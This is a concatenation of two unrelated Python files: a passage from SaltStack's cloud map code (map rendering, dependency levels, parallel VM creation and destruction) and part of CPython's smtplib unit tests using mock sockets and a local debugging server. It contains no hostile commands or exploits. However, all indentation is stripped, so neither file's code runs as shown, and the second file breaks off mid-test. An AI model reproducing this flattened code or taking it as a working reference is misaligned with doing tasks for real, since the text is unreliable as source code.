continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if self.clouds[fun]() is False:
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias is not properly "
"configured. Removing it from the available "
"providers list.",
driver,
alias,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
class Map(Cloud):
"""
Create a VM stateful map execution object
"""
def __init__(self, opts):
Cloud.__init__(self, opts)
self.rendered_map = self.read()
def interpolated_map(self, query="list_nodes", cached=False):
rendered_map = self.read().copy()
interpolated_map = {}
for profile, mapped_vms in rendered_map.items():
names = set(mapped_vms)
if profile not in self.opts["profiles"]:
if "Errors" not in interpolated_map:
interpolated_map["Errors"] = {}
msg = (
"No provider for the mapped '{}' profile was found. "
"Skipped VMS: {}".format(profile, ", ".join(names))
)
log.info(msg)
interpolated_map["Errors"][profile] = msg
continue
matching = self.get_running_by_names(names, query, cached)
for alias, drivers in matching.items():
for driver, vms in drivers.items():
for vm_name, vm_details in vms.items():
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = vm_details
try:
names.remove(vm_name)
except KeyError:
# If it's not there, then our job is already done
pass
if not names:
continue
profile_details = self.opts["profiles"][profile]
alias, driver = profile_details["provider"].split(":")
for vm_name in names:
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = "Absent"
return interpolated_map
def delete_map(self, query=None):
query_map = self.interpolated_map(query=query)
for alias, drivers in query_map.copy().items():
if alias == "Errors":
continue
for driver, vms in drivers.copy().items():
for vm_name, vm_details in vms.copy().items():
if vm_details == "Absent":
query_map[alias][driver].pop(vm_name)
if not query_map[alias][driver]:
query_map[alias].pop(driver)
if not query_map[alias]:
query_map.pop(alias)
return query_map
def get_vmnames_by_action(self, action):
query_map = self.interpolated_map("list_nodes")
matching_states = {
"start": ["stopped"],
"stop": ["running", "active"],
"reboot": ["running", "active"],
}
vm_names = []
for alias, drivers in query_map.items():
for driver, vms in drivers.items():
for vm_name, vm_details in vms.items():
# Only certain actions are support in to use in this case. Those actions are the
# "Global" salt-cloud actions defined in the "matching_states" dictionary above.
# If a more specific action is passed in, we shouldn't stack-trace - exit gracefully.
try:
state_action = matching_states[action]
except KeyError:
log.error(
"The use of '%s' as an action is not supported "
"in this context. Only 'start', 'stop', and "
"'reboot' are supported options.",
action,
)
raise SaltCloudException()
if (
vm_details != "Absent"
and vm_details["state"].lower() in state_action
):
vm_names.append(vm_name)
return vm_names
def read(self):
"""
Read in the specified map and return the map structure
"""
map_ = None
if self.opts.get("map", None) is None:
if self.opts.get("map_data", None) is None:
if self.opts.get("map_pillar", None) is None:
pass
elif self.opts.get("map_pillar") not in self.opts.get("maps"):
log.error(
"The specified map not found in pillar at " "'cloud:maps:%s'",
self.opts["map_pillar"],
)
raise SaltCloudNotFound()
else:
# 'map_pillar' is provided, try to use it
map_ = self.opts["maps"][self.opts.get("map_pillar")]
else:
# 'map_data' is provided, try to use it
map_ = self.opts["map_data"]
else:
# 'map' is provided, try to use it
local_minion_opts = copy.deepcopy(self.opts)
local_minion_opts["file_client"] = "local"
self.minion = salt.minion.MasterMinion(local_minion_opts)
if not os.path.isfile(self.opts["map"]):
if not (self.opts["map"]).startswith("salt://"):
log.error(
"The specified map file does not exist: '%s'", self.opts["map"]
)
raise SaltCloudNotFound()
if (self.opts["map"]).startswith("salt://"):
cached_map = self.minion.functions["cp.cache_file"](self.opts["map"])
else:
cached_map = self.opts["map"]
try:
renderer = self.opts.get("renderer", "jinja|yaml")
rend = salt.loader.render(self.opts, {})
blacklist = self.opts.get("renderer_blacklist")
whitelist = self.opts.get("renderer_whitelist")
map_ = compile_template(
cached_map, rend, renderer, blacklist, whitelist
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Rendering map %s failed, render error:\n%s",
self.opts["map"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {}
if "include" in map_:
map_ = salt.config.include_config(map_, self.opts["map"], verbose=False)
if not map_:
return {}
# Create expected data format if needed
for profile, mapped in map_.copy().items():
if isinstance(mapped, (list, tuple)):
entries = {}
for mapping in mapped:
if isinstance(mapping, str):
# Foo:
# - bar1
# - bar2
mapping = {mapping: None}
for name, overrides in mapping.items():
if overrides is None or isinstance(overrides, bool):
# Foo:
# - bar1:
# - bar2:
overrides = {}
try:
overrides.setdefault("name", name)
except AttributeError:
log.error(
"Cannot use 'name' as a minion id in a cloud map as it "
"is a reserved word. Please change 'name' to a different "
"minion id reference."
)
return {}
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, dict):
# Convert the dictionary mapping to a list of dictionaries
# Foo:
# bar1:
# grains:
# foo: bar
# bar2:
# grains:
# foo: bar
entries = {}
for name, overrides in mapped.items():
overrides.setdefault("name", name)
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, str):
# If it's a single string entry, let's make iterable because of
# the next step
mapped = [mapped]
map_[profile] = {}
for name in mapped:
map_[profile][name] = {"name": name}
return map_
def _has_loop(self, dmap, seen=None, val=None):
if seen is None:
for values in dmap["create"].values():
seen = []
try:
machines = values["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
else:
if val in seen:
return True
seen.append(val)
try:
machines = dmap["create"][val]["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
return False
def _calcdep(self, dmap, machine, data, level):
try:
deplist = data["requires"]
except KeyError:
return level
levels = []
for name in deplist:
try:
data = dmap["create"][name]
except KeyError:
try:
data = dmap["existing"][name]
except KeyError:
msg = "Missing dependency in cloud map"
log.error(msg)
raise SaltCloudException(msg)
levels.append(self._calcdep(dmap, name, data, level))
level = max(levels) + 1
return level
def map_data(self, cached=False):
"""
Create a data map of what to execute on
"""
ret = {"create": {}}
pmap = self.map_providers_parallel(cached=cached)
exist = set()
defined = set()
rendered_map = copy.deepcopy(self.rendered_map)
for profile_name, nodes in rendered_map.items():
if profile_name not in self.opts["profiles"]:
msg = (
"The required profile, '{}', defined in the map "
"does not exist. The defined nodes, {}, will not "
"be created.".format(
profile_name, ", ".join("'{}'".format(node) for node in nodes)
)
)
log.error(msg)
if "errors" not in ret:
ret["errors"] = {}
ret["errors"][profile_name] = msg
continue
profile_data = self.opts["profiles"].get(profile_name)
for nodename, overrides in nodes.items():
# Get associated provider data, in case something like size
# or image is specified in the provider file. See issue #32510.
if (
"provider" in overrides
and overrides["provider"] != profile_data["provider"]
):
alias, driver = overrides.get("provider").split(":")
else:
alias, driver = profile_data.get("provider").split(":")
provider_details = copy.deepcopy(self.opts["providers"][alias][driver])
del provider_details["profiles"]
# Update the provider details information with profile data
# Profile data and node overrides should override provider data, if defined.
# This keeps map file data definitions consistent with -p usage.
salt.utils.dictupdate.update(provider_details, profile_data)
nodedata = copy.deepcopy(provider_details)
# Update profile data with the map overrides
for setting in ("grains", "master", "minion", "volumes", "requires"):
deprecated = "map_{}".format(setting)
if deprecated in overrides:
log.warning(
"The use of '%s' on the '%s' mapping has "
"been deprecated. The preferred way now is to "
"just define '%s'. For now, salt-cloud will do "
"the proper thing and convert the deprecated "
"mapping into the preferred one.",
deprecated,
nodename,
setting,
)
overrides[setting] = overrides.pop(deprecated)
# merge minion grains from map file
if (
"minion" in overrides
and "minion" in nodedata
and "grains" in overrides["minion"]
and "grains" in nodedata["minion"]
):
nodedata["minion"]["grains"].update(overrides["minion"]["grains"])
del overrides["minion"]["grains"]
# remove minion key if now is empty dict
if not overrides["minion"]:
del overrides["minion"]
nodedata = salt.utils.dictupdate.update(nodedata, overrides)
# Add the computed information to the return data
ret["create"][nodename] = nodedata
# Add the node name to the defined set
alias, driver = nodedata["provider"].split(":")
defined.add((alias, driver, nodename))
def get_matching_by_name(name):
matches = {}
for alias, drivers in pmap.items():
for driver, vms in drivers.items():
for vm_name, details in vms.items():
if vm_name == name and driver not in matches:
matches[driver] = details["state"]
return matches
for alias, drivers in pmap.items():
for driver, vms in drivers.items():
for name, details in vms.items():
exist.add((alias, driver, name))
if name not in ret["create"]:
continue
# The machine is set to be created. Does it already exist?
matching = get_matching_by_name(name)
if not matching:
continue
# A machine by the same name exists
for item in matching:
if name not in ret["create"]:
# Machine already removed
break
log.warning(
"'%s' already exists, removing from " "the create map.",
name,
)
if "existing" not in ret:
ret["existing"] = {}
ret["existing"][name] = ret["create"].pop(name)
if "hard" in self.opts and self.opts["hard"]:
if self.opts["enable_hard_maps"] is False:
raise SaltCloudSystemExit(
"The --hard map can be extremely dangerous to use, "
"and therefore must explicitly be enabled in the main "
"configuration file, by setting 'enable_hard_maps' "
"to True"
)
# Hard maps are enabled, Look for the items to delete.
ret["destroy"] = exist.difference(defined)
return ret
def run_map(self, dmap):
"""
Execute the contents of the VM map
"""
if self._has_loop(dmap):
msg = "Uh-oh, that cloud map has a dependency loop!"
log.error(msg)
raise SaltCloudException(msg)
# Go through the create list and calc dependencies
for key, val in dmap["create"].items():
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["create"][key]["level"] = level
try:
existing_list = dmap["existing"].items()
except KeyError:
existing_list = {}.items()
for key, val in existing_list:
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["existing"][key]["level"] = level
# Now sort the create list based on dependencies
create_list = sorted(dmap["create"].items(), key=lambda x: x[1]["level"])
output = {}
if self.opts["parallel"]:
parallel_data = []
master_name = None
master_minion_name = None
master_host = None
master_finger = None
try:
master_name, master_profile = next(
(
(name, profile)
for name, profile in create_list
if profile.get("make_master", False) is True
)
)
master_minion_name = master_name
log.debug("Creating new master '%s'", master_name)
if (
salt.config.get_cloud_config_value("deploy", master_profile, self.opts)
is False
):
raise SaltCloudSystemExit(
"Cannot proceed with 'make_master' when salt deployment "
"is disabled(ex: --no-deploy)."
)
# Generate the master keys
log.debug("Generating master keys for '%s'", master_profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", master_profile, self.opts)
)
master_profile["master_pub"] = pub
master_profile["master_pem"] = priv
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_temp_pub = salt.utils.files.mkstemp()
with salt.utils.files.fopen(master_temp_pub, "w") as mtp:
mtp.write(pub)
master_finger = salt.utils.crypt.pem_finger(
master_temp_pub, sum_type=self.opts["hash_type"]
)
os.unlink(master_temp_pub)
if master_profile.get("make_minion", True) is True:
master_profile.setdefault("minion", {})
if "id" in master_profile["minion"]:
master_minion_name = master_profile["minion"]["id"]
# Set this minion's master as local if the user has not set it
if "master" not in master_profile["minion"]:
master_profile["minion"]["master"] = "127.0.0.1"
if master_finger is not None:
master_profile["master_finger"] = master_finger
# Generate the minion keys to pre-seed the master:
for name, profile in create_list:
make_minion = salt.config.get_cloud_config_value(
"make_minion", profile, self.opts, default=True
)
if make_minion is False:
continue
log.debug("Generating minion keys for '%s'", profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", profile, self.opts)
)
profile["pub_key"] = pub
profile["priv_key"] = priv
# Store the minion's public key in order to be pre-seeded in
# the master
master_profile.setdefault("preseed_minion_keys", {})
master_profile["preseed_minion_keys"].update({name: pub})
local_master = False
if (
master_profile["minion"].get("local_master", False)
and master_profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
out = self.create(master_profile, local_master=local_master)
if not isinstance(out, dict):
log.debug("Master creation details is not a dictionary: {}".format(out))
elif "Errors" in out:
raise SaltCloudSystemExit(
"An error occurred while creating the master, not "
"continuing: {}".format(out["Errors"])
)
deploy_kwargs = (
self.opts.get("show_deploy_args", False) is True
and
# Get the needed data
out.get("deploy_kwargs", {})
or
# Strip the deploy_kwargs from the returned data since we don't
# want it shown in the console.
out.pop("deploy_kwargs", {})
)
master_host = deploy_kwargs.get(
"salt_host", deploy_kwargs.get("host", None)
)
if master_host is None:
raise SaltCloudSystemExit(
"Host for new master {} was not found, "
"aborting map".format(master_name)
)
output[master_name] = out
except StopIteration:
log.debug("No make_master found in map")
# Local master?
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_pub = os.path.join(self.opts["pki_dir"], "master.pub")
if os.path.isfile(master_pub):
master_finger = salt.utils.crypt.pem_finger(
master_pub, sum_type=self.opts["hash_type"]
)
opts = self.opts.copy()
if self.opts["parallel"]:
# Force display_ssh_output to be False since the console will
# need to be reset afterwards
log.info(
"Since parallel deployment is in use, ssh console output "
"is disabled. All ssh output will be logged though"
)
opts["display_ssh_output"] = False
local_master = master_name is None
for name, profile in create_list:
if name in (master_name, master_minion_name):
# Already deployed, it's the master's minion
continue
if (
"minion" in profile
and profile["minion"].get("local_master", False)
and profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
if master_finger is not None and local_master is False:
profile["master_finger"] = master_finger
if master_host is not None:
profile.setdefault("minion", {})
profile["minion"].setdefault("master", master_host)
if self.opts["parallel"]:
parallel_data.append(
{
"opts": opts,
"name": name,
"profile": profile,
"local_master": local_master,
}
)
continue
# Not deploying in parallel
try:
output[name] = self.create(profile, local_master=local_master)
if (
self.opts.get("show_deploy_args", False) is False
and "deploy_kwargs" in output
and isinstance(output[name], dict)
):
output[name].pop("deploy_kwargs", None)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
output[name] = {"Error": str(exc)}
for name in dmap.get("destroy", ()):
output[name] = self.destroy(name)
if self.opts["parallel"] and parallel_data:
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Cloud pool size: %s", pool_size)
output_multip = enter_mainloop(
_create_multiprocessing, parallel_data, pool_size=pool_size
)
# We have deployed in parallel, now do start action in
# correct order based on dependencies.
if self.opts["start_action"]:
actionlist = []
grp = -1
for key, val in groupby(dmap["create"].values(), lambda x: x["level"]):
actionlist.append([])
grp += 1
for item in val:
actionlist[grp].append(item["name"])
out = {}
for group in actionlist:
log.info(
"Running %s on %s", self.opts["start_action"], ", ".join(group)
)
with salt.client.get_local_client() as client:
out.update(
client.cmd(
",".join(group),
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
tgt_type="list",
)
)
for obj in output_multip:
next(iter(obj.values()))["ret"] = out[next(iter(obj.keys()))]
output.update(obj)
else:
for obj in output_multip:
output.update(obj)
return output
def init_pool_worker():
"""
Make every worker ignore KeyboarInterrup's since it will be handled by the
parent process.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
def create_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the create is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
cloud = Cloud(parallel_data["opts"])
try:
output = cloud.create(
parallel_data["profile"], local_master=parallel_data["local_master"]
)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
if parallel_data["opts"].get("show_deploy_args", False) is False and isinstance(
output, dict
):
output.pop("deploy_kwargs", None)
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def destroy_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the destroy is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
clouds = salt.loader.clouds(parallel_data["opts"])
try:
fun = clouds["{}.destroy".format(parallel_data["driver"])]
with salt.utils.context.func_globals_inject(
fun,
__active_provider_name__=":".join(
[parallel_data["alias"], parallel_data["driver"]]
),
):
output = fun(parallel_data["name"])
except SaltCloudException as exc:
log.error(
"Failed to destroy %s. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def run_parallel_map_providers_query(data, queue=None):
"""
This function will be called from another process when building the
providers map.
"""
salt.utils.crypt.reinit_crypto()
cloud = Cloud(data["opts"])
try:
with salt.utils.context.func_globals_inject(
cloud.clouds[data["fun"]],
__active_provider_name__=":".join([data["alias"], data["driver"]]),
):
return (
data["alias"],
data["driver"],
salt.utils.data.simple_types_filter(cloud.clouds[data["fun"]]()),
)
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for running nodes: %s",
data["fun"],
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any nodes
return data["alias"], data["driver"], ()
# for pickle and multiprocessing, we can't use directly decorators
def _run_parallel_map_providers_query(*args, **kw):
return communicator(run_parallel_map_providers_query)(*args[0], **kw)
def _destroy_multiprocessing(*args, **kw):
return communicator(destroy_multiprocessing)(*args[0], **kw)
def _create_multiprocessing(*args, **kw):
return communicator(create_multiprocessing)(*args[0], **kw)
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import unittest
from test import support, mock_socket
try:
import threading
except ImportError:
threading = None
HOST = support.HOST
if sys.platform == 'darwin':
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
def testQuoteData(self):
teststr = 'abc\n.jkl\rfoo\r\n..blue'
expected = 'abc\r\n..jkl\r\nfoo\r\n...blue'
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b'220 Hola mundo')
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b'220 Hola mundo')
smtp = smtplib.SMTP(HOST, self.port, source_address=('127.0.0.1',
19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b'220 Hola mundo')
smtp = smtplib.SMTP('%s:%s' % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b'220 Hola mundo')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='testhost')
self.assertEqual(smtp.local_hostname, 'testhost')
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b'220 Hola mundo')
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b'220 Hola mundo')
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b'220 Hola mundo')
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b'220 Hello world')
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile('^connect:', re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b'220 Hello world')
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile('^\\d{2}:\\d{2}:\\d{2}\\.\\d{6} connect: ',
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
self.port = self.serv.socket.getsockname()[1]
serv_args = self.serv, self.serv_evt, self.client_evt
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
self.client_evt.set()
self.serv_evt.wait()
self.thread.join()
sys.stdout = self.old_stdout
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.quit()
def testSourceAddress(self):
port = support.find_unused_port()
try:
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3, source_address=('127.0.0.1', port))
self.assertEqual(smtp.source_address, ('127.0.0.1', port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
expected = 250, b'OK'
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
expected = 250, b'OK'
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
expected = 250, b'\nSIZE 33554432\nHELP'
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
expected = 502, b'EXPN not implemented'
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
expected = (252, b'Cannot VRFY user, but will accept message ' +
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.helo()
expected = 503, b'Duplicate HELO/EHLO'
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.assertEqual(smtp.help(),
b'Supported commands: EHLO HELO MAIL ' +
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.sendmail('John', 'Sally', m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.sendmail('John', 'Sally', m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.sendmail('John', 'Sally', m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.sendmail('<>', 'Sally', m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: <>$', re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'
] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m)
time.sleep(0.01)
smtp.quit()
self.assertEqual(m['Bcc'],
'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
m['X-Peer'] = socket.gethostbyname('localhost')
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: foo@bar.com$', re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile("^recips: .*'{}'.*$".format(addr), re.
MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: foo@bar.com$', re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile("^recips: .*'{}'.*$".format(addr), re.
MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs=
'foo@example.net')
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: joe@example.com$', re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile("^recips: .*'{}'.*$".format(addr), re.
MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile("^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
